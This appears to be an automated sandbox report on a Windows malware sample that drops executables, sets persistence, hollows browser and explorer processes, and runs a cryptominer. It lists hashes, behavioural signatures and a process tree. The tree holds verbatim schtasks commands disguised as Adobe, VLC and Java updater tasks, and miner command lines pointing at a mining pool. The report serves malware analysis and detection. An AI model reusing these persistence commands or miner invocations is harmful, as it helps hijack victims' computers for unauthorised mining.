Analysis
-
max time kernel
136s -
max time network
136s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
-
submitted
21-11-2022 15:58
General
-
Target
3f8537c87613bee8b3177b3f82683de311f8d6dad209cd896af765fb534b7485.exe
-
Size
2.1MB
-
MD5
12591f2681dc8dd84da78efc3f28ceeb
-
SHA1
6688fb84fa39f7c999e44baf31981da548c83b9c
-
SHA256
3f8537c87613bee8b3177b3f82683de311f8d6dad209cd896af765fb534b7485
-
SHA512
fddbb0aa9f33d40410d0a5061a9f454ea6ec0836e0f8bdb6eb859db4fbaf9be81948776f7b34eb3ac08cf1d353ff8b93900f0658613ac61cd10a3c2f0abeee03
-
SSDEEP
49152:JEVUcGNLJpVCsl4vQxgGwd0L4sC2OdXXohUiI68:JE3GNFWIPoafIP
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
-
Modifies Installed Components in the registry 2 TTPs 6 IoCs
-
UPX packed file 3 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 16 IoCs
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
AutoIT Executable 13 IoCs
AutoIT scripts compiled to PE executables.
-
Suspicious use of SetThreadContext 11 IoCs
-
Drops file in Program Files directory 36 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 34 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\3f8537c87613bee8b3177b3f82683de311f8d6dad209cd896af765fb534b7485.exe"C:\Users\Admin\AppData\Local\Temp\3f8537c87613bee8b3177b3f82683de311f8d6dad209cd896af765fb534b7485.exe"1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\~12591f26.exe"C:\Users\Admin\AppData\Local\Temp\~12591f26.exe"2⤵
- Executes dropped EXE
- Modifies Installed Components in the registry
- Checks computer location settings
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C DIR /A:D /S /B *3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C DIR /A:D /S /B *3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C DIR /A:D /S /B *3⤵
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /F /RL HIGHEST /SC MINUTE /MO 13 /TN "Adobe Reader and Acrobat Manager" /TR "\"C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\AdobeARM.exe\""3⤵
- Creates scheduled task(s)
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /F /RL HIGHEST /SC MINUTE /MO 27 /TN "ccUpdMgr" /TR "\"C:\Program Files\VideoLAN\VLC\locale\fur\ccUpdMgr.exe\""3⤵
- Creates scheduled task(s)
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /F /RL HIGHEST /SC MINUTE /MO 18 /TN "Adobe Reader and Acrobat Manager" /TR "\"C:\Program Files\Common Files\microsoft shared\ink\bg-BG\AdobeARM.exe\""3⤵
- Creates scheduled task(s)
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /F /RL HIGHEST /SC MINUTE /MO 9 /TN "Adobe Reader and Acrobat Manager" /TR "\"C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\PROFILE\AdobeARM.exe\""3⤵
- Creates scheduled task(s)
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /F /SC ONLOGON /TN "BCSSync" /TR "\"C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\BCSSync.exe\""3⤵
- Creates scheduled task(s)
-
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exeC:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe3⤵
- Executes dropped EXE
- Modifies Installed Components in the registry
- Checks computer location settings
- Adds Run key to start application
- Enumerates connected drives
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C DIR /A:D /S /B *4⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C DIR /A:D /S /B *4⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C DIR /A:D /S /B *4⤵
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /F /RL HIGHEST /SC MINUTE /MO 28 /TN "Adobe Reader and Acrobat Manager" /TR "\"C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\AdobeARM.exe\""4⤵
- Creates scheduled task(s)
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /F /RL HIGHEST /SC MINUTE /MO 31 /TN "ccUpdMgr" /TR "\"C:\Program Files\VideoLAN\VLC\locale\fur\ccUpdMgr.exe\""4⤵
- Creates scheduled task(s)
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /F /RL HIGHEST /SC MINUTE /MO 21 /TN "Adobe Reader and Acrobat Manager" /TR "\"C:\Program Files\Common Files\microsoft shared\ink\bg-BG\AdobeARM.exe\""4⤵
- Creates scheduled task(s)
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /F /RL HIGHEST /SC MINUTE /MO 17 /TN "Adobe Reader and Acrobat Manager" /TR "\"C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\PROFILE\AdobeARM.exe\""4⤵
- Creates scheduled task(s)
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /F /SC ONLOGON /TN "BCSSync" /TR "\"C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\BCSSync.exe\""4⤵
- Creates scheduled task(s)
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -u node.bot6 -p x -o http://ypool.net:8081 -t 2 -m5124⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -u node.bot6 -p x -o http://ypool.net:8081 -t 2 -m5124⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" -u node.bot6 -p x -o http://ypool.net:8081 -t 2 -m5124⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" -u node.bot6 -p x -o http://ypool.net:8081 -t 2 -m5124⤵
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -u node.bot6 -p x -o http://ypool.net:8081 -t 2 -m5124⤵
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -u node.bot6 -p x -o http://ypool.net:8081 -t 2 -m5124⤵
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe" -u node.bot6 -p x -o http://ypool.net:8081 -t 2 -m5124⤵
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe" -u node.bot6 -p x -o http://ypool.net:8081 -t 2 -m5124⤵
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe" -u node.bot6 -p x -o http://ypool.net:8081 -t 2 -m5124⤵
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe" -u node.bot6 -p x -o http://ypool.net:8081 -t 2 -m5124⤵
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe" -u node.bot6 -p x -o http://ypool.net:8081 -t 2 -m5124⤵
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.6MB
MD5e222f8164b697174f23e5bb4b9abcf91
SHA1735db7fa8babe368e0063a2c1db0626f227b8f61
SHA256b17d70d31b8ed4c428a2272284e86283427ca075854c6c37fc481dec36513e22
SHA51293297af38c35914fefa111244960153e3802f78b4fdb691727179f26fc78fb6e02a934bb6ca117ffcb5312f9e00b125eb70ecce29127a646374332d92bd03236
-
Filesize
2.6MB
MD556d24fc185d927afe65f530ae545110b
SHA1f643d786ce3866f0fc1789fbc078d80b4ec45060
SHA256a024f0e6f89bdb740f8c415d3e36604e6ebc385b9858a3217a24bf4ccd029eb3
SHA51232b2f0ff47b5a25e9a1e06d79c0eccd7d4589ca39cd5aee07c3c8d4911a7f6960fb291543fafe977b600b0fc8fb6602edd9c198a15d2160375dc171f2a8e0c81
-
Filesize
2.6MB
MD5ea01c203ef5d7b77e2b4372121c8ec67
SHA10f0797603c97af939d52ec6d5d522e352c93bf4d
SHA2569265917f2906f5fab310151ca030e0818c41f2362032319bfb54883911714833
SHA512dbe1ce8a7d0835c94375a7131029838421acd906c8ff5220718f648cd8b3e00e5a97559fb78b5610a7918e4345ab495df45c0152494fa5147bb7ce368f48acb9
-
Filesize
2.6MB
MD5a3a955b03820ce0a3c89042bfb371d59
SHA16c518f8c7f88bc7cb364c6b14779f9c684aa0daa
SHA2562090d869a198b750255810358d60309c8f0dc386ab25515c9792eea960e71942
SHA51242f876a695b83d9df84698500ddca1343c406874ed13fedcba08ebf7f1a8134b3cac3b136b635ac8535872d718bab5eb31094227bb8e5a89bb5637479dc8a074
-
Filesize
2.6MB
MD54e360f89f6786ab9f58f20250022f0f5
SHA1e59f67f40740c1545bc038fe259ffad69e5367a3
SHA25616d9cf5c6225cf109c9e46970c37a5d93d870671d82539d3d70f1d0443979389
SHA51280cb61c2d43526412793423fa78e18ace920464b15a5704fd72a56d154006bc0a49b8f1d31c935f5e326c5987b5b21b1bb9331f83c381ba3755f3a807ea65f1c
-
Filesize
2.6MB
MD5b4bee81fbe402c8df0ab397f69bb8222
SHA10f61fc3020cad5641ba64c36dff6f3c8cd2351bf
SHA2568c22f8bcc5e24820bf672f227a333eb6db4cef7eabb1391328888323cbbbe9b8
SHA512c11524de873dfa673cf96f22464769ca86ba6767f42df6392d6b807b79d7f8010f01c491e1add0803cb56a65d37e639e7605d315c0a14df12e7adda3907ee9cf
-
Filesize
2.6MB
MD57d4cde864d7fd1a85d3a4b7ce3dd676d
SHA1d9c5ee8018ca17a038bc03d40d678ee13f7a71d0
SHA256238a4313cef67fcd31a611fd974d9f8a607c708eba6883b7eca49a8f803c5e0d
SHA51272b3d72103e3209dfe89062cc018462acd3057c0c2ea2fb8e71a921fe950d067475cabcdc409edc2d9b0298d943f03702cde8ae3a5a29feff337865bce61400f
-
Filesize
2.6MB
MD57d4cde864d7fd1a85d3a4b7ce3dd676d
SHA1d9c5ee8018ca17a038bc03d40d678ee13f7a71d0
SHA256238a4313cef67fcd31a611fd974d9f8a607c708eba6883b7eca49a8f803c5e0d
SHA51272b3d72103e3209dfe89062cc018462acd3057c0c2ea2fb8e71a921fe950d067475cabcdc409edc2d9b0298d943f03702cde8ae3a5a29feff337865bce61400f
-
Filesize
2.6MB
MD5c097cbcd90a69c014d488a9064129982
SHA1f3e6052a5b6cb279f6977451fcc7b6da811b9724
SHA256529ffd716e228aa05a74d8135432e4358786a15e9ed076c6d7cf9f0daae26ce0
SHA512c56ef657113631822d4b356802ef40347232caa5456dbb4a690ae795847950fcfc9bafb198a1ae8e4f000e4553ea61a84a5022f45cf5d608a5f775df7cc48482
-
Filesize
2.6MB
MD5004b7f07b5518e30e98dd7b435ba7841
SHA1e3fc6122f641e6a8f856e9f92b832307406cfabe
SHA2563e216d1beeb40d80429758ede2f16269ea1223ebad36da39c85bbb3dec93f9a4
SHA512acf0520038fb51a4e1b20ce21b3cc7b3dbaeb9d04e6171b8b575b6d6e894b5d829a7df9fbc199c4bf78ee25f196a33d424327002559cd526871d908fb19c1a7a
-
Filesize
2.6MB
MD5004b7f07b5518e30e98dd7b435ba7841
SHA1e3fc6122f641e6a8f856e9f92b832307406cfabe
SHA2563e216d1beeb40d80429758ede2f16269ea1223ebad36da39c85bbb3dec93f9a4
SHA512acf0520038fb51a4e1b20ce21b3cc7b3dbaeb9d04e6171b8b575b6d6e894b5d829a7df9fbc199c4bf78ee25f196a33d424327002559cd526871d908fb19c1a7a
-
-
-
-
Filesize
284KB
-
Filesize
284KB
-
-
Filesize
284KB
-
-
-
-
-
Filesize
284KB
-
Filesize
284KB
-
Filesize
284KB
-
-
-
-
Filesize
284KB
-
-
Filesize
284KB
-
Filesize
284KB
-
Filesize
284KB
-
-
Filesize
284KB
-
Filesize
284KB
-
-
Filesize
284KB
-
-
-
-
Filesize
284KB
-
Filesize
284KB
-
-
Filesize
284KB
-
-
Filesize
716KB
-
Filesize
716KB
-
Filesize
716KB
-
-
-
-